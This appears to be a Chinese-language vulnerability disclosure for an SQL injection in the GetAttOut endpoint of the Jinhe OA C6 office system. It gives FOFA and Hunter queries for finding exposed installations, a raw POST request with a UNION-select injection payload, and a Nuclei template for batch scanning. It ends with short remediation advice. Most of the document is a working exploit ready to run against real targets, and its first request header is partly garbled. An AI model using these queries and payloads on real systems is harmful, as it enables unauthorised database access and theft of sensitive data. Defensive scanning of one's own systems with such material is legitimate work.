【产品介绍】

金和OA协同办公管理系统C6软件（简称金和OA），本着简单、适用、高效的原则，贴合企事业单位的实际需求，实行通用化、标准化、智能化、人性化的产品设计，充分体现企事业单位规范管理、提高办公效率的核心思想，为用户提供一整套标准的办公自动化解决方案，以帮助企事业单位迅速建立便捷规范的办公环境。

【漏洞介绍】

金和OA GetAttOut 存在sql注入，攻击者可通过此漏洞获取敏感信息。

【资产测绘Query】

Fofa语法:app=”金和网络-金和OA”

Hunter语法:app.name=”金和 OA”

【产品界面】

【漏洞复现】

POST /jc6/JHSoft.WCF/TEST/GetAttOut HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0
Connection: close
Content-Length: 11

1' union select null,null,@@version,null,null,null--

【Nuclei-Poc】

id: jinhe-jc6-sql

info:
  name: jinhe-jc6-sql
  author: m0be1
  severity: high
  description: jinhe-jc6-sql
  tags: jinhe-jc6-sql


requests:
  - raw:
      - |
        POST /jc6/JHSoft.WCF/TEST/GetAttOut HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Connection: close
        Content-Length: 11

        1' union select null,null,@@version,null,null,null--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Microsoft"

【验证】

.\nuclei -l 1.txt -t 1.yaml

【修复建议】

1、请联系厂商进行修复。2、如非必要，禁止公网访问该系统。3、设置白名单访问。